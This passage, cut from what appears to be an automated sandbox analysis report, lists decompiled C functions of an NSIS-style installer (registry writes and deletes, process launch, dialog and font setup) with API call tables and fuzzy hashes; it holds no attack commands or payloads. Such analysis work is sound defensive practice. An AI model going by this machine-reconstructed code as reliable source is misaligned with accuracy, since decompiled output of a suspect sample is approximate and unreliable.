                      					_v60 = 4;
                      					SendMessageA(_t28, 0x110c, 0,  &_v60);
                      					return _v24;
                      				}
                      				_t19 = GetMessagePos();
                      				_v16 = _t19 >> 0x10;
                      				_v20 = _t19;
                      				ScreenToClient(_t28,  &_v20);
                      				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                      				if((_v12 & 0x00000066) != 0) {
                      					_t15 = _v8;
                      					goto L4;
                      				}
                      				return _t25 | 0xffffffff;
                      			}















                      APIs
                      • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040470D
                      • GetMessagePos.USER32 ref: 00404715
                      • ScreenToClient.USER32 ref: 0040472F
                      • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404741
                      • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404767
                      Strings
                      Similarity
                      • API ID: Message$Send$ClientScreen
                      • String ID: f
                      • API String ID: 41195575-1993550816
                      • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                      • Instruction ID: 77fe7446b7d437ffed3a300e181f1a5f8136abba45dafe536ab26234a61f9ca7
                      • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                      • Instruction Fuzzy Hash: 74014071D00219BADB01DBA4DD45BFEBBB8AB55711F10012ABA10B71C0D7B4A5018B95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 90%
                      			E004022F5(void* __eax) {
                      				void* _t15;
                      				char* _t18;
                      				int _t19;
                      				char _t24;
                      				int _t27;
                      				signed int _t30;
                      				intOrPtr _t35;
                      				void* _t37;
                      
                      				_t15 = E00402ADD(__eax);
                      				_t35 =  *((intOrPtr*)(_t37 - 0x14));
                      				 *(_t37 - 0x30) =  *(_t37 - 0x10);
                      				 *(_t37 - 0x44) = E004029E8(2);
                      				_t18 = E004029E8(0x11);
                      				_t30 =  *0x423f50; // 0x0
                      				_t31 = _t30 | 0x00000002;
                      				 *(_t37 - 4) = 1;
                      				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
                      				if(_t19 == 0) {
                      					if(_t35 == 1) {
                      						E004029E8(0x23);
                      						_t19 = lstrlenA(0x40a368) + 1;
                      					}
                      					if(_t35 == 4) {
                      						_t24 = E004029CB(3);
                      						 *0x40a368 = _t24;
                      						_t19 = _t35;
                      					}
                      					if(_t35 == 3) {
                      						_t19 = E00402F01(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a368, 0xc00);
                      					}
                      					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a368, _t19) == 0) {
                      						 *(_t37 - 4) = _t27;
                      					}
                      					_push( *(_t37 + 8));
                      					RegCloseKey();
                      				}
                      				 *0x423f28 =  *0x423f28 +  *(_t37 - 4);
                      				return 0;
                      			}












                      APIs
                      • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402333
                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsx7FAF.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402353
                      • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsx7FAF.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040238C
                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsx7FAF.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040246F
                      Strings
                      Similarity
                      • API ID: CloseCreateValuelstrlen
                      • String ID: C:\Users\user\AppData\Local\Temp\nsx7FAF.tmp
                      • API String ID: 1356686001-866893742
                      • Opcode ID: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
                      • Instruction ID: c0f72d529a206c1f33eb9b8d59e365bb4fe54d10a3d93e78d78dba992e985e14
                      • Opcode Fuzzy Hash: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
                      • Instruction Fuzzy Hash: 0F1175B1E00118BFEB10AFA1DE4AEAF767CEB04758F10443AF505B71D0D6B99D019A69
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00403897(void* __ecx, void* __eflags) {
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				signed short _t6;
                      				intOrPtr _t11;
                      				signed int _t13;
                      				intOrPtr _t15;
                      				signed int _t16;
                      				signed short* _t18;
                      				signed int _t20;
                      				signed short* _t23;
                      				intOrPtr _t25;
                      				signed int _t26;
                      				intOrPtr* _t27;
                      
                      				_t24 = "1033";
                      				_t13 = 0xffff;
                      				_t6 = E004059FC(__ecx, "1033");
                      				while(1) {
                      					_t26 =  *0x423ee4; // 0x1
                      					if(_t26 == 0) {
                      						goto L7;
                      					}
                      					_t15 =  *0x423eb0; // 0x4de368
                      					_t16 =  *(_t15 + 0x64);
                      					_t20 =  ~_t16;
                      					_t18 = _t16 * _t26 +  *0x423ee0;
                      					while(1) {
                      						_t18 = _t18 + _t20;
                      						_t26 = _t26 - 1;
                      						if((( *_t18 ^ _t6) & _t13) == 0) {
                      							break;
                      						}
                      						if(_t26 != 0) {
                      							continue;
                      						}
                      						goto L7;
                      					}
                      					 *0x423680 = _t18[1];
                      					 *0x423f48 = _t18[3];
                      					_t23 =  &(_t18[5]);
                      					if(_t23 != 0) {
                      						 *0x42367c = _t23;
                      						E004059E3(_t24,  *_t18 & 0x0000ffff);
                      						SetWindowTextA( *0x420470, E00405AA7(_t13, _t24, _t26, "jefgbrzfgglybaslbprz Setup", 0xfffffffe));
                      						_t11 =  *0x423ecc; // 0x2
                      						_t27 =  *0x423ec8; // 0x4de514
                      						if(_t11 == 0) {
                      							L15:
                      							return _t11;
                      						}
                      						_t25 = _t11;
                      						do {
                      							_t11 =  *_t27;
                      							if(_t11 != 0) {
                      								_t5 = _t27 + 0x18; // 0x4de52c
                      								_t11 = E00405AA7(_t13, _t25, _t27, _t5, _t11);
                      							}
                      							_t27 = _t27 + 0x418;
                      							_t25 = _t25 - 1;
                      						} while (_t25 != 0);
                      						goto L15;
                      					}
                      					L7:
                      					if(_t13 != 0xffff) {
                      						_t13 = 0;
                      					} else {
                      						_t13 = 0x3ff;
                      					}
                      				}
                      			}


















                      APIs
                      • SetWindowTextA.USER32(00000000,jefgbrzfgglybaslbprz Setup), ref: 0040392F
                      Strings
                      Similarity
                      • API ID: TextWindow
                      • String ID: 1033$C:\Users\user\AppData\Local\Temp\$hM$jefgbrzfgglybaslbprz Setup
                      • API String ID: 530164218-2157112962
                      • Opcode ID: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
                      • Instruction ID: 77a07bfd4d582853364bfe0cce575c4745298431d34a1254bec181f891eb0756
                      • Opcode Fuzzy Hash: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
                      • Instruction Fuzzy Hash: 3611C271B005119BC334AF15D880A373BBDEF84726369827BE901A73A1C77E9E039A58
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00402BC5(intOrPtr _a4) {
                      				char _v68;
                      				long _t6;
                      				struct HWND__* _t7;
                      				struct HWND__* _t14;
                      
                      				if(_a4 != 0) {
                      					_t14 =  *0x417044; // 0x0
                      					if(_t14 != 0) {
                      						_t14 = DestroyWindow(_t14);
                      					}
                      					 *0x417044 = 0;
                      					return _t14;
                      				}
                      				__eflags =  *0x417044; // 0x0
                      				if(__eflags != 0) {
                      					return E00405DDC(0);
                      				}
                      				_t6 = GetTickCount();
                      				__eflags = _t6 -  *0x423eac;
                      				if(_t6 >  *0x423eac) {
                      					__eflags =  *0x423ea8; // 0x0
                      					if(__eflags == 0) {
                      						_t7 = CreateDialogParamA( *0x423ea0, 0x6f, 0, E00402B2D, 0);
                      						 *0x417044 = _t7;
                      						return _t7;
                      					}
                      					__eflags =  *0x423f54 & 0x00000001;
                      					if(( *0x423f54 & 0x00000001) != 0) {
                      						wsprintfA( &_v68, "... %d%%", E00402BA9());
                      						return E00404E23(0,  &_v68);
                      					}
                      				}
                      				return _t6;
                      			}








                      APIs
                      • DestroyWindow.USER32(00000000,00000000), ref: 00402BDD
                      • GetTickCount.KERNEL32 ref: 00402BFB
                      • CreateDialogParamA.USER32(0000006F,00000000,00402B2D,00000000), ref: 00402C4D
                        • Part of subcall function 00402BA9: MulDiv.KERNEL32(00000000,00000064,00000C1B), ref: 00402BBE
                      • wsprintfA.USER32 ref: 00402C29
                        • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                        • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                        • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                        • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                        • Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                        • Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                        • Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                      Strings
                      Similarity
                      • API ID: MessageSend$Windowlstrlen$CountCreateDestroyDialogParamTextTicklstrcatwsprintf
                      • String ID: ... %d%%
                      • API String ID: 632923820-2449383134
                      • Opcode ID: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
                      • Instruction ID: 259a824e759da58d6bdbd9050b41674a690fb301749dacda7e517d53f8420425
                      • Opcode Fuzzy Hash: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
                      • Instruction Fuzzy Hash: 29019270909224EBDB216F60EF4C99F7B78AB047017104137F801B12D1C6BCA986C6EE
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 84%
                      			E00402A28(void* _a4, char* _a8, long _a12) {
                      				void* _v8;
                      				char _v272;
                      				signed char _t16;
                      				long _t18;
                      				long _t25;
                      				intOrPtr* _t27;
                      				long _t28;
                      
                      				_t16 =  *0x423f50; // 0x0
                      				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
                      				if(_t18 == 0) {
                      					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                      						__eflags = _a12;
                      						if(_a12 != 0) {
                      							RegCloseKey(_v8);
                      							L8:
                      							__eflags = 1;
                      							return 1;
                      						}
                      						_t25 = E00402A28(_v8,  &_v272, 0);
                      						__eflags = _t25;
                      						if(_t25 != 0) {
                      							break;
                      						}
                      					}
                      					RegCloseKey(_v8);
                      					_t27 = E00405DA3(2);
                      					if(_t27 == 0) {
                      						__eflags =  *0x423f50; // 0x0
                      						if(__eflags != 0) {
                      							goto L8;
                      						}
                      						_t28 = RegDeleteKeyA(_a4, _a8);
                      						__eflags = _t28;
                      						if(_t28 != 0) {
                      							goto L8;
                      						}
                      						return _t28;
                      					}
                      					return  *_t27(_a4, _a8,  *0x423f50, 0);
                      				}
                      				return _t18;
                      			}











                      APIs
                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A49
                      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A85
                      • RegCloseKey.ADVAPI32(?), ref: 00402A8E
                      • RegCloseKey.ADVAPI32(?), ref: 00402AB3
                      • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AD1
                      Similarity
                      • API ID: Close$DeleteEnumOpen
                      • String ID:
                      • API String ID: 1912718029-0
                      • Opcode ID: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
                      • Instruction ID: 7ac3799e0b9b7f286de12d9a89f233b53136cfd59643404f79253a10a0ceffad
                      • Opcode Fuzzy Hash: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
                      • Instruction Fuzzy Hash: AA115931A00009FEDF21AF90DE48DAB3B79EB44395B104536BA05A01A0DB749E51AE69
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00401CC1(int __edx) {
                      				void* _t17;
                      				struct HINSTANCE__* _t21;
                      				struct HWND__* _t25;
                      				void* _t27;
                      
                      				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
                      				GetClientRect(_t25, _t27 - 0x40);
                      				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029E8(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
                      				if(_t17 != _t21) {
                      					DeleteObject(_t17);
                      				}
                      				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t27 - 4));
                      				return 0;
                      			}








                      APIs
                      • GetDlgItem.USER32 ref: 00401CC5
                      • GetClientRect.USER32 ref: 00401CD2
                      • LoadImageA.USER32 ref: 00401CF3
                      • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
                      • DeleteObject.GDI32(00000000), ref: 00401D10
                      Similarity
                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                      • String ID:
                      • API String ID: 1849352358-0
                      • Opcode ID: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
                      • Instruction ID: ad5020e38ef11d08f371025551c7f23f007b957d45941c5b52acf933ea75ddf9
                      • Opcode Fuzzy Hash: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
                      • Instruction Fuzzy Hash: 31F0F9B2A04105BFD700EBA4EE89DAFB7BDEB44341B104476F601F21A0C7789D018B29
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 51%
                      			E00404610(int _a4, intOrPtr _a8, unsigned int _a12) {
                      				char _v36;
                      				char _v68;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* _t26;
                      				void* _t34;
                      				signed int _t36;
                      				signed int _t39;
                      				unsigned int _t46;
                      
                      				_t46 = _a12;
                      				_push(0x14);
                      				_pop(0);
                      				_t34 = 0xffffffdc;
                      				if(_t46 < 0x100000) {
                      					_push(0xa);
                      					_pop(0);
                      					_t34 = 0xffffffdd;
                      				}
                      				if(_t46 < 0x400) {
                      					_t34 = 0xffffffde;
                      				}
                      				if(_t46 < 0xffff3333) {
                      					_t39 = 0x14;
                      					asm("cdq");
                      					_t46 = _t46 + 1 / _t39;
                      				}
                      				_push(E00405AA7(_t34, 0, _t46,  &_v36, 0xffffffdf));
                      				_push(E00405AA7(_t34, 0, _t46,  &_v68, _t34));
                      				_t21 = _t46 & 0x00ffffff;
                      				_t36 = 0xa;
                      				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
                      				_push(_t46 >> 0);
                      				_t26 = E00405AA7(_t34, 0, 0x420498, 0x420498, _a8);
                      				wsprintfA(_t26 + lstrlenA(0x420498), "%u.%u%s%s");
                      				return SetDlgItemTextA( *0x423678, _a4, 0x420498);
                      			}














                      APIs
                      • lstrlenA.KERNEL32(00420498,00420498,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404530,000000DF,0000040F,00000400,00000000), ref: 0040469E
                      • wsprintfA.USER32 ref: 004046A6
                      • SetDlgItemTextA.USER32 ref: 004046B9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: ItemTextlstrlenwsprintf
                      • String ID: %u.%u%s%s
                      • API String ID: 3540041739-3551169577
                      • Opcode ID: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
                      • Instruction ID: 4c66ffa9968b47036da968d2f23bae361eeba693da1d293f62fa9500f86314f5
                      • Opcode Fuzzy Hash: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
                      • Instruction Fuzzy Hash: 6211E6737001243BDB10A5699C45EAF3299DBC2335F14423BF625F61D1E9798C1186A9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 51%
                      			E00401BAD() {
                      				signed int _t28;
                      				CHAR* _t31;
                      				long _t32;
                      				int _t37;
                      				signed int _t38;
                      				int _t42;
                      				int _t48;
                      				struct HWND__* _t52;
                      				void* _t55;
                      
                      				 *(_t55 - 0x34) = E004029CB(3);
                      				 *(_t55 + 8) = E004029CB(4);
                      				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
                      					 *((intOrPtr*)(__ebp - 0x34)) = E004029E8(0x33);
                      				}
                      				__eflags =  *(_t55 - 0x10) & 0x00000002;
                      				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
                      					 *(_t55 + 8) = E004029E8(0x44);
                      				}
                      				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
                      				_push(1);
                      				if(__eflags != 0) {
                      					_t50 = E004029E8();
                      					_t28 = E004029E8();
                      					asm("sbb ecx, ecx");
                      					asm("sbb eax, eax");
                      					_t31 =  ~( *_t27) & _t50;
                      					__eflags = _t31;
                      					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
                      					goto L10;
                      				} else {
                      					_t52 = E004029CB();
                      					_t37 = E004029CB();
                      					_t48 =  *(_t55 - 0x10) >> 2;
                      					if(__eflags == 0) {
                      						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
                      						L10:
                      						 *(_t55 - 8) = _t32;
                      					} else {
                      						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
                      						asm("sbb eax, eax");
                      						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
                      					}
                      				}
                      				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
                      				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
                      					_push( *(_t55 - 8));
                      					E004059E3();
                      				}
                      				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t55 - 4));
                      				return 0;
                      			}













                      APIs
                      • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                      • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: MessageSend$Timeout
                      • String ID: !
                      • API String ID: 1777923405-2657877971
                      • Opcode ID: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
                      • Instruction ID: c520659e647c29be31daea63823ecf32d675036654070bdfdaec67237a792274
                      • Opcode Fuzzy Hash: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
                      • Instruction Fuzzy Hash: 902183B1A44104BEDF01AFB5CE5BAAD7A75EF45704F14047AF501B61D1D6B88940D728
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E004052E5(CHAR* _a4) {
                      				struct _PROCESS_INFORMATION _v20;
                      				int _t7;
                      
                      				0x4224a0->cb = 0x44;
                      				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x4224a0,  &_v20);
                      				if(_t7 != 0) {
                      					CloseHandle(_v20.hThread);
                      					return _v20.hProcess;
                      				}
                      				return _t7;
                      			}






                      APIs
                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004224A0,Error launching installer), ref: 0040530A
                      • CloseHandle.KERNEL32(?), ref: 00405317
                      Strings
                      • Error launching installer, xrefs: 004052F8
                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004052E5
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: CloseCreateHandleProcess
                      • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                      • API String ID: 3712363035-2984075973
                      • Opcode ID: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
                      • Instruction ID: 638c90c2c8bd3d8652662e5a24b63cb160f6dc818783434175b306b50d96cec4
                      • Opcode Fuzzy Hash: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
                      • Instruction Fuzzy Hash: 32E0ECB4A00209BFDB00AF64ED09B6F7BBCFB04348F808522A911E2150D7B4E8148A69
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00405578(CHAR* _a4) {
                      				CHAR* _t7;
                      
                      				_t7 = _a4;
                      				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                      					lstrcatA(_t7, 0x40900c);
                      				}
                      				return _t7;
                      			}





                      APIs
                      • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 0040557E
                      • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405587
                      • lstrcatA.KERNEL32(?,0040900C), ref: 00405598
                      Strings
                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405578
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: CharPrevlstrcatlstrlen
                      • String ID: C:\Users\user\AppData\Local\Temp\
                      • API String ID: 2659869361-3916508600
                      • Opcode ID: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                      • Instruction ID: 4689f4cb8dc724d8b29f049f697397264ef60a28c46f00026a2de7c751f5ddbe
                      • Opcode Fuzzy Hash: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                      • Instruction Fuzzy Hash: 17D0A962609A307EE20222159C05ECB2A08CF42301B048022F500B62D2C33C4D418FFE
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 85%
                      			E00401EC5(char __ebx, char* __edi, char* __esi) {
                      				char* _t18;
                      				int _t19;
                      				void* _t30;
                      
                      				_t18 = E004029E8(0xffffffee);
                      				 *(_t30 - 0x2c) = _t18;
                      				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
                      				 *__esi = __ebx;
                      				 *(_t30 - 8) = _t19;
                      				 *__edi = __ebx;
                      				 *((intOrPtr*)(_t30 - 4)) = 1;
                      				if(_t19 != __ebx) {
                      					__eax = GlobalAlloc(0x40, __eax);
                      					 *(__ebp + 8) = __eax;
                      					if(__eax != __ebx) {
                      						if(__eax != 0) {
                      							__ebp - 0x44 = __ebp - 0x34;
                      							if(VerQueryValueA( *(__ebp + 8), 0x40900c, __ebp - 0x34, __ebp - 0x44) != 0) {
                      								 *(__ebp - 0x34) = E004059E3(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
                      								 *(__ebp - 0x34) = E004059E3(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
                      								 *((intOrPtr*)(__ebp - 4)) = __ebx;
                      							}
                      						}
                      						_push( *(__ebp + 8));
                      						GlobalFree();
                      					}
                      				}
                      				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
                      				return 0;
                      			}







                      APIs
                      • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                      • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                      • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                      • VerQueryValueA.VERSION(?,0040900C,?,?,?,?,?,00000000), ref: 00401F24
                        • Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                      • String ID:
                      • API String ID: 1404258612-0
                      • Opcode ID: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
                      • Instruction ID: 32b4c4ba67c2d4aeec558e743cb191f9ba8cb92773df28d6a4a6bb64e08d8cf3
                      • Opcode Fuzzy Hash: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
                      • Instruction Fuzzy Hash: 43111CB2900108BEDB01EFA5D945DAEBBB9EF04354B20807AF505F61E1D7789E54DB28
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 67%
                      			E00401D1B() {
                      				void* __esi;
                      				int _t6;
                      				signed char _t11;
                      				struct HFONT__* _t14;
                      				void* _t18;
                      				void* _t24;
                      				void* _t26;
                      				void* _t28;
                      
                      				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
                      				0x40af6c->lfHeight =  ~(MulDiv(E004029CB(2), _t6, 0x48));
                      				 *0x40af7c = E004029CB(3);
                      				_t11 =  *((intOrPtr*)(_t28 - 0x14));
                      				 *0x40af83 = 1;
                      				 *0x40af80 = _t11 & 0x00000001;
                      				 *0x40af81 = _t11 & 0x00000002;
                      				 *0x40af82 = _t11 & 0x00000004;
                      				E00405AA7(_t18, _t24, _t26, 0x40af88,  *((intOrPtr*)(_t28 - 0x20)));
                      				_t14 = CreateFontIndirectA(0x40af6c);
                      				_push(_t14);
                      				_push(_t26);
                      				E004059E3();
                      				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t28 - 4));
                      				return 0;
                      			}












                      APIs
                      • GetDC.USER32(?), ref: 00401D22
                      • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                      • CreateFontIndirectA.GDI32(0040AF6C), ref: 00401D8A
                      Memory Dump Source
